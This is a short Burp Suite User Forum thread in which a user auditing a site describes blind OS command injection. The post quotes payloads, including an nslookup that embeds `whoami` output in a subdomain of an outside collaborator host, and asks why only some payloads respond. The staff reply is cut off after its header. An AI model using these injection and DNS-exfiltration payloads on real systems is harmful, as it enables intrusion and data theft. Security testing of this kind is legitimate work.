The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Command Injection Issues

Devstroi | Last updated: Dec 07, 2023 03:04AM UTC

Issue:  OS command injection Severity:  High Confidence:  Certain I am auditing a site with blind injection of commands from the burp suite repeater, the problem is that only the following command responds to me in the following way `nslookup kgji2ohoyw.web-attacker.com` The burpsuite collaborator receives the response successfully, but when trying something else like a PING or whoami for example: `nslookup `whoami`.kgji2ohoyw.web-attacker.com` ` ping -c 10 127.0.0.1 ` it does not receive a response

Dominyque, PortSwigger Agent | Last updated: Dec 07, 2023 08:31AM UTC